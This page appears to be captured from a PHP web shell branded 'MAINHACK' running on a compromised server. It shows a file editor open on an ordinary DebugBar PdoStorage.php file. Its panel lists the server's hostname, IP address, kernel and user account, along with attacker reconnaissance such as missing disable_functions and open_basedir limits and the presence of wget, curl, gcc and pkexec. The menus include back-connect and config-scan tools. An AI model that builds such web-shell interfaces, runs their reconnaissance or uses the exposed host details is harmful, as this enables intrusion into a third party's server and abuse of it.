[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: PdoStorage.php
<?php /* * This file is part of the DebugBar package. * * (c) 2013 Maxime Bouroumeau-Fuseau * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace DebugBar\Storage; use PDO; /** * Stores collected data into a database using PDO */ class PdoStorage implements StorageInterface { protected $pdo; protected $tableName; protected $sqlQueries = array( 'save' => "INSERT INTO %tablename% (id, data, meta_utime, meta_datetime, meta_uri, meta_ip, meta_method) VALUES (?, ?, ?, ?, ?, ?, ?)", 'get' => "SELECT data FROM %tablename% WHERE id = ?", 'find' => "SELECT data FROM %tablename% %where% ORDER BY meta_datetime DESC LIMIT %limit% OFFSET %offset%", 'clear' => "DELETE FROM %tablename%" ); /** * @param \PDO $pdo The PDO instance * @param string $tableName * @param array $sqlQueries */ public function __construct(PDO $pdo, $tableName = 'phpdebugbar', array $sqlQueries = array()) { $this->pdo = $pdo; $this->tableName = $tableName; $this->setSqlQueries($sqlQueries); } /** * Sets the sql queries to be used * * @param array $queries */ public function setSqlQueries(array $queries) { $this->sqlQueries = array_merge($this->sqlQueries, $queries); } /** * {@inheritdoc} */ public function save($id, $data) { $sql = $this->getSqlQuery('save'); $stmt = $this->pdo->prepare($sql); $meta = $data['__meta']; $stmt->execute(array($id, serialize($data), $meta['utime'], $meta['datetime'], $meta['uri'], $meta['ip'], $meta['method'])); } /** * {@inheritdoc} */ public function get($id) { $sql = $this->getSqlQuery('get'); $stmt = $this->pdo->prepare($sql); $stmt->execute(array($id)); if (($data = $stmt->fetchColumn(0)) !== false) { return unserialize($data); } return null; } /** * {@inheritdoc} */ public function find(array $filters = array(), $max = 20, $offset = 0) { $where = array(); $params = array(); foreach ($filters as $key => $value) { $where[] = "meta_$key = ?"; $params[] = $value; } if (count($where)) { $where = " WHERE " . implode(' AND ', $where); } else { $where = ''; } $sql = $this->getSqlQuery('find', array( 'where' => $where, 'offset' => $offset, 'limit' => $max )); $stmt = $this->pdo->prepare($sql); $stmt->execute($params); $results = array(); foreach ($stmt->fetchAll() as $row) { $data = unserialize($row['data']); $results[] = $data['__meta']; unset($data); } return $results; } /** * {@inheritdoc} */ public function clear() { $this->pdo->exec($this->getSqlQuery('clear')); } /** * Get a SQL Query for a task, with the variables replaced * * @param string $name * @param array $vars * @return string */ protected function getSqlQuery($name, array $vars = array()) { $sql = $this->sqlQueries[$name]; $vars = array_merge(array('tablename' => $this->tableName), $vars); foreach ($vars as $k => $v) { $sql = str_replace("%$k%", $v, $sql); } return $sql; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.62 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002